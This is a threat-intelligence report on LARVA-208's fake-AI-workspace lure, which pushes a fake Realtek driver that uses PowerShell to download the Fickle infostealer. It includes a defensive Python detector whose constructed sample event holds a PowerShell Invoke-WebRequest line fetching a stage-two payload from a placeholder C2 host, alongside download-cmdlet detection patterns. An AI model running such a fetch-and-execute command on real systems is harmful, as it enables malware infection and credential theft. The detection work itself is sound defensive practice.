A sophisticated new phishing campaign orchestrated by the threat group LARVA-208 has been uncovered, targeting Web3 developers by imitating legitimate AI workspace platforms in a bid to harvest user credentials and sensitive project data.
Well-known for its social engineering tactics and phishing operations against IT professionals, LARVA-208 has recently pivoted its focus to exploit the trust placed in emerging AI technologies and decentralized development environments.
Social Engineering Campaign
Recent investigations reveal that LARVA-208 is leveraging domains such as “norlax.ai”, a convincing clone of the reputable AI workspace “teampilot.ai”, to lure victims into elaborate social engineering traps.

The attackers initiate contact by sending direct messages or emails to Web3 developers, often framing their outreach as job opportunities, portfolio reviews, or interviews for enticing positions in the blockchain and cryptocurrency sectors.
Once rapport is established, targets receive bespoke meeting links that ostensibly lead to AI-powered collaboration spaces.
According to Catalyst Report, the attackers meticulously generate unique email invitations and access codes, heightening the appearance of legitimacy and minimizing the risk of mass detection.
Upon accessing the fraudulent Norlax AI platform, victims are prompted to join what appears to be a genuine call.
The deception deepens as the attackers enable their microphones, simulating an authentic interview environment.
However, the victim’s microphone invariably encounters a purported “audio driver error,” prompting a download link for what is presented as a Realtek HD Audio Driver.
Behind this façade lies malicious code: when the executable is launched, a PowerShell payload is covertly deployed, reaching out to actor-controlled command and control (C2) infrastructure to download the Fickle infostealer.
The Fickle malware, delivered under the guise of trusted software, is engineered to exfiltrate a broad spectrum of system data, including machine and user identifiers, hardware configurations, installed programs, running processes, and comprehensive geolocation information.
Collected credentials, crypto wallets, and other development secrets are promptly transferred to LARVA-208’s C2 servers, known as SilentPrism, enabling real-time victim monitoring and pursuit of lucrative assets.
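The execution chain described above (a downloaded “driver” executable spawning PowerShell, which then fetches the next stage from C2) is one that defenders can hunt for in process-creation telemetry. The following Python is an added example, not code from the original report or from any vendor; it scores parent/child pairs over constructed Sysmon-style events, and the paths, PIDs and placeholder URL are assumptions.

```python
import re

# Heuristics derived from the reported chain: a user-downloaded "audio driver"
# executable launches PowerShell, which then fetches the next stage from C2.
DOWNLOAD_CMDLETS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata|desktop)\\|\\temp\\", re.I)
LURE_NAME = re.compile(r"realtek|audio.?driver", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)

# Constructed Sysmon-style process-creation events (not real campaign telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3000, "image": r"C:\Users\dev\Downloads\Realtek HD Audio Driver.exe",
     "cmdline": r'"C:\Users\dev\Downloads\Realtek HD Audio Driver.exe"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Invoke-WebRequest https://C2-PLACEHOLDER.invalid/stage2 -OutFile $env:TEMP\s2.exe"'},
    # Benign: a developer's editor (also a user-writable path) runs a build via PowerShell.
    {"pid": 5010, "ppid": 1, "image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": "Code.exe"},
    {"pid": 5022, "ppid": 5010,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command npm run build"},
]

def find_suspicious_chains(events):
    """Flag PowerShell children matching two or more indicators of the driver-lure
    chain; a single weak indicator alone is ignored so developer tooling stays quiet."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not POWERSHELL.search(e["image"]):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        reasons = []
        if USER_WRITABLE.search(parent["image"]):
            reasons.append("parent executable runs from a user-writable path")
        if LURE_NAME.search(parent["image"]):
            reasons.append("parent name mimics an audio driver installer")
        if DOWNLOAD_CMDLETS.search(e["cmdline"]):
            reasons.append("PowerShell command line fetches remote content")
        if len(reasons) >= 2:
            alerts.append({"pid": e["pid"], "parent": parent["image"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious_chains(SAMPLE_EVENTS):
        print(alert)
```

Only the PowerShell process under the fake driver installer is reported; the editor-launched build shares one indicator (a user-writable parent path) but falls below the threshold.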

Threat Actors Shift Tactics
Two primary attack vectors have been observed. The initial approach targets active members of blockchain and Web3 communities, mainly through platforms like X (formerly Twitter) and Telegram, by offering supposed interviews or project collaborations.
The secondary method exploits recruitment platforms like Remote3, circumventing platform-native security by first engaging candidates via legitimate Google Meet sessions before transitioning the conversation to the malicious Norlax AI environment, in defiance of established platform guidelines.
While LARVA-208 previously employed .LNK shortcut files disguised as plausible administrative scripts that surreptitiously executed PowerShell commands, recent campaigns show a shift towards malicious executable downloads and the use of reputable file-hosting services such as Filebin for payload distribution.
As a means of operational security and continuity, the group leverages bulletproof hosting providers like FFv2 for both phishing and C2 domains.
Notably, these infrastructure elements overlap with resources attributed to the notorious Luminous Mantis group, further muddying attribution and complicating takedown efforts.
This technically adept social engineering campaign demonstrates a clear evolution in attacker methodology, emphasizing the exploitation of trending technology interfaces to bypass established security controls.
By weaponizing both social trust and technical obfuscation, LARVA-208 has effectively expanded its reach to high-value targets in the Web3 ecosystem, underscoring the persistent and adaptable nature of contemporary cybercrime.
As infostealers like Fickle are deployed under new guises and monetization strategies evolve away from classic ransomware models, the campaign signals an urgent need for Web3 professionals to scrutinize unsolicited job offers, carefully validate platform authenticity, and adopt robust endpoint security practices.
The incident serves as a stark reminder that the intersection of innovation and opportunism in cybercriminal tactics continues to threaten the confidentiality and integrity of digital assets and developer operations worldwide.